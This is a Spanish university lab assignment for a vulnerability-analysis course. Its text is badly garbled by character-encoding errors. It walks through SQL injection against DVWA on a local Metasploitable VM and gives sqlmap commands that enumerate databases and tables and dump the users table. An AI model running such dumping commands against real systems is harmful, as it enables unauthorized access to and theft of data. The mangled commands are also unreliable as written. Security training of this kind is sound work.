Asignatura Análisis de vulnerabilidades Datos del alumno alumno Fecha Apellidos: Nombre: Acc t i v i d a d e s
Views 324 Downloads 3 File size 540KB
Asignatura Análisis de vulnerabilidades
Datos del alumno alumno
Fecha
Apellidos: Nombre:
Acc t i v i d a d e s A Trabajo: Realizar ataques SQL Injection contra la aplicación D!A "n la si#uiente actividad deber$s realizar diversos ataques sobre la aplicación D!A utilizando la t%cnica de SQL injection& 'ara ello( debes utilizar la )erramienta )erramienta SQL*ap +instalada en ,ali por de-ecto.& Se valora valorar$ r$ posit positiva ivamen mente te que e/pli e/plique quess debida debidamen mente te los pasos pasos se#uid se#uidos os para para la realización de cada ataque& Tendr$s que: 0 Indicar cu$l1cu$les son los par$metros vulnerables vulnerables de la 2RL& 0 3btener los nombres de las bases de datos disponibles& 0 Recuperar los nombres de las tablas de la base de datos dv4a& 0 Recuperar el contenido de las tablas de la base de datos dv4a& Extensión máxima: 56 máxima: 56 p$#inas +7eor#ia 55 e interlineado 5(8.&
TEMA 3 – Actividades
9 2niversidad Internacional Internacional de La Rioja( S& A& +2NIR.
Asignatura Análisis de vulnerabilidades
Datos del alumno
Fecha
Apellidos: Nombre:
Solución Para el desarrollo de la solución utilizaremos un entorno virtual con dos máquinas virtuales, siendo la primera la maquina victima (Metasploitable) ya que tiene configurada la aplicación DV! y como maquina atacante ("ali #inu$) la misma que tiene instalado %M!P'
Primero comprobamos que tanto la maquina atacante como la victima estn en la misma red'
TEMA 3 – Actividades
9 2niversidad Internacional de La Rioja( S& A& +2NIR.
Asignatura Análisis de vulnerabilidades
Datos del alumno
Fecha
Apellidos: Nombre:
Desde la maquina atacante accedemos a un navegador eb de preferencia *irefo$ y digitamos la direccion de la maquina victima para el caso +-'+./'-'+. y seleccionamos la aplicación DV!'
%e mostrara la siguiente pantalla las credenciales por defecto son0 1surio0 admin Passord0 passord
Prepararemos el nivel de seguridad de la plataforma DV!, para facilitar el entorno de ataque situándolo en seguridad ba2a'
TEMA 3 – Actividades
9 2niversidad Internacional de La Rioja( S& A& +2NIR.
Asignatura Análisis de vulnerabilidades
Datos del alumno
Fecha
Apellidos: Nombre:
ndicar cuál!cuáles son los "arámetros vulnerables de la #$%& Para identificar los parámetros vulnerables de la 13# 4acemos clic en el men5 lateral en la opción 6% 72ection8 y seguidamente en el botón %ubmit'
!l 4acer clic en el botón %ubmit nuestra 13# cambia ya que utiliza el metodo 9:; para obtener la información ingresada y muestra el parametro vulnerable 6id8
TEMA 3 – Actividades
9 2niversidad Internacional de La Rioja( S& A& +2NIR.
Asignatura Análisis de vulnerabilidades
Datos del alumno
Fecha
Apellidos: Nombre:
'btener los nombres de las bases de datos dis"onibles& !gent y las >coo?ieG8 securityGlo P=P%:%%7DGaFb+AdeF+FA+-FHA.c/.cbHHI+bcII8 >u J4ttp0@@+-'+./'-'+.@dva@vulnerabilities@sqli@KidG+>L3%ubmitG%ubmitNJ >>dbs
!l finalizar la e2ecución nos mostrara información sobre el sistema operativo, motor de base de datos y la lista de bases disponibles'
TEMA 3 – Actividades
9 2niversidad Internacional de La Rioja( S& A& +2NIR.
Asignatura Análisis de vulnerabilidades
Datos del alumno
Fecha
Apellidos: Nombre:
$ecu"erar los nombres de las tablas de la base de datos dv(a& Para recuperar las tablas de la base de datos dva al comando utilizado en el punto anterior le cambiamos ciertos parámetros sqlmap >>4eadersG8 Mozilla@A'B (C++ #inu$ $/.E.F rv0.+'B) 9ec?o@-B+BB+B+ *irefo$@.+'B8 >>coo?ieG8 securityGlo P=P%:%%7DGaFb+AdeF+FA+-FHA.c/.cbHHI+bcII8 >u J4ttp0@@+-'+./'-'+.@dva@vulnerabilities@sqli@KidG+>L3%ubmitG%ubmitNJ >D dva >>tables
!l finalizar la e2ecución nos retorna la información que necesitamos'
$ecu"erar el contenido de las tablas de la base de datos dv(a& De similar forma para este punto cambiaremos parte del comando del punto + agregando los parámetros que se muestran a continuación' ;abla guestboo? sqlmap >>4eadersG8 Mozilla@A'B (C++ #inu$ $/.E.F rv0.+'B) 9ec?o@-B+BB+B+ *irefo$@.+'B8 >>coo?ieG8 securityGlo P=P%:%%7DGaFb+AdeF+FA+-FHA.c/.cbHHI+bcII8 >u J4ttp0@@+-'+./'-'+.@dva@vulnerabilities@sqli@KidG+>L3%ubmitG%ubmitNJ >>dump >>batc4 >; guestboo? >D dva
TEMA 3 – Actividades
9 2niversidad Internacional de La Rioja( S& A& +2NIR.
Asignatura Análisis de vulnerabilidades
Datos del alumno
Fecha
Apellidos: Nombre:
:speramos que finalice la e2ecucion de la instrucción nos retorna'
;abla users sqlmap >>4eadersG8 Mozilla@A'B (C++ #inu$ $/.E.F rv0.+'B) 9ec?o@-B+BB+B+ *irefo$@.+'B8 >>coo?ieG8 securityGlo P=P%:%%7DGaFb+AdeF+FA+-FHA.c/.cbHHI+bcII8 >u J4ttp0@@+-'+./'-'+.@dva@vulnerabilities@sqli@KidG+>L3%ubmitG%ubmitNJ >>dump >>batc4 >; users >D dva
!l finalizar nos retorna la tabla con los datos de los usuarios como se muestra a continuación'
)eri*icación de usuarios obtenidos' 1tilizamos uno de los usuarios obtenidos en el punto anterior en la pantalla de login de la aplicación'
TEMA 3 – Actividades
9 2niversidad Internacional de La Rioja( S& A& +2NIR.
Asignatura Análisis de vulnerabilidades
Datos del alumno
Fecha
Apellidos: Nombre:
+arámetros S,%Ma" utili-ados >> 4eaders >> coo?ie >> dbs >D >> tables >> dump >> batc4 >;
:ncabezados adicionales Valor del encabezado 4ttp coo?ie :numerar bases de datos DLM% Lase de datos DLM% para enumerar :numerar tablas de base de datos DLM% Volcado de DLM% Ounca solicite la entrada del usuario, usar predeterminado ;abla (s) de base de datos DLM% para enumerar
TEMA 3 – Actividades
9 2niversidad Internacional de La Rioja( S& A& +2NIR.